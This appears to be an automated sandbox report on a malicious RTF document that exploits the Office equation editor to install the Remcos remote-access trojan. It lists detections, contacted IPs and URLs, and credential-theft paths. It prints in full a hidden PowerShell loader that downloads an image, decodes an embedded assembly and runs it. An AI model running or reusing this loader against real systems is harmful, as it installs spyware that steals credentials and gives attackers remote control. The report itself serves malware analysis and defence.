?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.tsonu/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                Source: RegAsm.exe, 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome] - Microsoft Word
                Source: RegAsm.exe, 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: RegAsm.exe, 00000009.00000002.906391209.0000000000946000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906391209.0000000000967000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434CB6 cpuid 9_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004489D7 GetSystemTimeAsFileTime,9_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B69E GetUserNameW,9_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449210
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA4D
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db9_2_0040BB6B

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JAJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe9_2_0040569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		Valid Accounts1
                Native API                		111
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		13
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts53
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		2
                Obfuscated Files or Information                		211
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol211
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts121
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Access Token Manipulation                		1
                Install Root Certificate                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		1
                DLL Side-Loading                		NTDS3
                File and Directory Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell                		Network Logon Script222
                Process Injection                		1
                Bypass User Account Control                		LSA Secrets34
                System Information Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials2
                Security Software Discovery                		VNCGUI Input Capture113
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Modify Registry                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Virtualization/Sandbox Evasion                		Proc Filesystem3
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1509586 Sample: xnHel.rtf Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 21 other signatures 2->56 10 WINWORD.EXE 336 18 2->10         started        process3 file4 32 C:\Users\...\~WRD0000.tmp:Zone.Identifier, ASCII 10->32 dropped 34 C:\Users\user\Desktop\~WRD0000.tmp, Rich 10->34 dropped 36 C:\Users\user\Desktop\~$xnHel.rtf, data 10->36 dropped 38 2 other malicious files 10->38 dropped 13 EQNEDT32.EXE 12 10->13         started        process5 dnsIp6 48 45.90.89.123, 49161, 49163, 80 CMCSUS Bulgaria 13->48 40 C:\...\seennewthingsentireworldseethethin.vbS, Unicode 13->40 dropped 84 Office equation editor establishes network connection 13->84 86 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->86 18 wscript.exe 1 13->18         started        file7 signatures8 process9 signatures10 58 Suspicious powershell command line found 18->58 60 Wscript starts Powershell (via cmd or directly) 18->60 62 Very long command line found 18->62 64 3 other signatures 18->64 21 powershell.exe 4 18->21         started        process11 signatures12 66 Suspicious powershell command line found 21->66 68 Suspicious execution chain found 21->68 24 powershell.exe 12 5 21->24         started        process13 dnsIp14 42 ia601706.us.archive.org 207.241.227.96, 443, 49162 INTERNET-ARCHIVEUS United States 24->42 70 Installs new ROOT certificates 24->70 72 Writes to foreign memory regions 24->72 74 Injects a PE file into a foreign processes 24->74 28 RegAsm.exe 3 13 24->28         started        signatures15 process16 dnsIp17 44 45.90.89.98, 49164, 8243 CMCSUS Bulgaria 28->44 46 geoplugin.net 178.237.33.50, 49165, 80 ATOM86-ASATOM86NL Netherlands 28->46 76 Contains functionality to bypass UAC (CMSTPLUA) 28->76 78 Detected Remcos RAT 28->78 80 Contains functionalty to change the wallpaper 28->80 82 5 other signatures 28->82 signatures18

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                xnHel.rtf47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                xnHel.rtf100%AviraHEUR/Rtf.Malformed

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\Desktop\~WRD0000.tmp100%AviraEXP/CVE-2017-11882.Gen

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://45.90.89.123/421/UNOST.txt0%Avira URL Cloudsafe
                45.90.89.980%Avira URL Cloudsafe
                http://geoplugin.net/json.gp&0%Avira URL Cloudsafe
                http://ocsp.entrust.net030%Avira URL Cloudsafe
                http://geoplugin.net/json.gp=0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                http://geoplugin.net/json.gp0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFj0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe
                https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg0%Avira URL Cloudsafe
                https://ia601706.us.archive.org0%Avira URL Cloudsafe
                http://45.90.89.123/421/seennewthingsentireworldseethethings.tIF0%Avira URL Cloudsafe
                http://45.90.89.1230%Avira URL Cloudsafe
                http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFr0%Avira URL Cloudsafe
                http://go.microsoft.c0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
                https://ia601706.us.archive.org/2/items/new_image_LR0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  ia601706.us.archive.org
                  		207.241.227.96
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    45.90.89.98true
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.90.89.123/421/UNOST.txttrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpgtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gp&RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net03powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gp=RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFjEQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFrEQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ia601706.us.archive.orgpowershell.exe, 00000008.00000002.398173022.00000000028B9000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://go.microsoft.cpowershell.exe, 00000008.00000002.398059563.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.90.89.123powershell.exe, 00000008.00000002.398173022.00000000029D9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.402026819.0000000002781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.398173022.0000000002781000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ia601706.us.archive.org/2/items/new_image_LRpowershell.exe, 00000006.00000002.402026819.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    207.241.227.96
                    		ia601706.us.archive.orgUnited States
                    		7941INTERNET-ARCHIVEUStrue
                    45.90.89.123
                    		unknownBulgaria
                    		33657CMCSUStrue
                    45.90.89.98
                    		unknownBulgaria
                    		33657CMCSUStrue
                    178.237.33.50
                    		geoplugin.netNetherlands
                    		8455ATOM86-ASATOM86NLfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1509586
                    Start date and time:2024-09-11 20:21:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 29s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:xnHel.rtf
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.expl.evad.winRTF@10/21@2/4
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 69
                    • Number of non-executed functions: 183
                    Cookbook Comments:
                    • Found application associated with file extension: .rtf
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 79848.3484625322 for current running targets taking high CPU consumption
                    • Override analysis time to 159696.696925064 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3340 because there are no executed function
                    • Execution Graph export aborted for target powershell.exe, PID 3536 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: xnHel.rtf

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:22:13API Interceptor69x Sleep call for process: EQNEDT32.EXE modified
                    14:22:16API Interceptor10x Sleep call for process: wscript.exe modified
                    14:22:17API Interceptor102x Sleep call for process: powershell.exe modified
                    14:22:29API Interceptor9690448x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    207.241.227.96INV_00983.xlsGet hashmaliciousRemcosBrowse
                      Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                          xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                            45.90.89.98PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                  M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                    oothgirl.docGet hashmaliciousRemcosBrowse
                                      M12_20240821_0.xlsGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.8441.24466.rtfGet hashmaliciousRemcosBrowse
                                          M12_20240821_06212.xlsGet hashmaliciousRemcosBrowse
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.11787.15148.rtfGet hashmaliciousRemcosBrowse
                                              wire_receipt.xlsGet hashmaliciousRemcosBrowse
                                                178.237.33.50INV_00983.xlsGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                rfq_last_quater_product_purchase_order_import_list_11_06_2024_000000110924.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                ORDER DATASHEET.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                • geoplugin.net/json.gp
                                                rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                HSBC E-Statement Doc_pdf.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • geoplugin.net/json.gp
                                                XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ia601706.us.archive.orgINV_00983.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                • 207.241.227.96
                                                RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                geoplugin.netINV_00983.xlsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                rfq_last_quater_product_purchase_order_import_list_11_06_2024_000000110924.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                ORDER DATASHEET.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 178.237.33.50
                                                rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                HSBC E-Statement Doc_pdf.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 178.237.33.50
                                                XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CMCSUSxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • 45.89.247.65
                                                PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                                • 45.90.89.98
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
